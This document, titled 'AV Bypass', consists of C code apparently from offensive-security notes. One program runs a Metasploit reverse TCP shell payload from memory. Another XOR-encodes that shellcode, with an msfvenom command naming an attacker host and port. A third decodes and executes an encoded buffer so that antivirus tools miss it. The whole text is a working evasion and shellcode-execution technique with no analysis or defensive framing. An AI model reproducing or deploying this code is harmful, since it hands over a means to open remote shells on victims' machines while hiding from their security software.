AV Bypass

#define _GNU_SOURCE
#include <sys/mman.h> // for mprotect 
#include <stdlib.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

//'linux/x64/shell_reverse_tcp' payload
unsigned char buf[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x01\xbb\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05";

int main (int argc, char **argv) 
{
        intptr_t pagesize = sysconf(_SC_PAGESIZE);
        if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)),
                pagesize, PROT_READ|PROT_EXEC))
        {
                perror("mprotect");
                return -1;
        }
        	
	int (*ret)() = (int(*)())buf;
  	ret();
  
        return 0;
}

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.67 LPORT=443 -f c
unsigned char buf[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x01\xbb\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05";

int main (int argc, char **argv) 
{
	char xor_key = 'J';
	int payload_length = (int) sizeof(buf);

	for (int i=0; i<payload_length; i++)
	{
		printf("\\x%02X",buf[i]^xor_key);
	}

	return 0;
}

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main (int argc, char **argv) 
{
	char buf[] = "\x20\x73\x12\x45\x4F\x02\xCF\x8A...x32\x71\x02\xDD\x02\xF3\x48";
	
	char xor_key = 'J';
	int arraysize = (int) sizeof(buf);
	
	for (int i=0; i<arraysize; i++)
	{
		buf[i] = buf[i]^xor_key;
	}
	
	int (*ret)() = (int(*)())buf;
	ret();
	
	return 0;
}